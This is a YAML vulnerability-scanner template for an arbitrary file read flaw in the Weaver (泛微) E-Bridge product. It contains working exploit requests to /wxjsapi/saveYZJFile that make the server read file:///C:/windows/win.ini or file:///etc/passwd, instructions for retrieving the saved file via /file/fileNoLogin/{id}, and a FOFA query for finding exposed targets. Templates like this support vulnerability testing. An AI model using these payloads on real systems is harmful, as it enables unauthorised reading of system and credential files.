product: 泛微 E-Bridge
vName: 泛微E-Bridge saveYZJFile 任意文件读取-windows
type: 文件读取
vID: [ ]
level: 3
vDesc: 泛微云桥e-Bridge存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。
version: ''
note: 拼接上面获得的id号，读取文件/file/fileNoLogin/{id}
search:
  FOFA: app="泛微云桥e-Bridge"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17775878.html
fix: [ ]
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/windows/win.ini&fileExt=txt
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - filepath
              - filesize
            logic: and
  - exp:
      method: get
      follow: false
      path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - filepath
              - filesize
            logic: and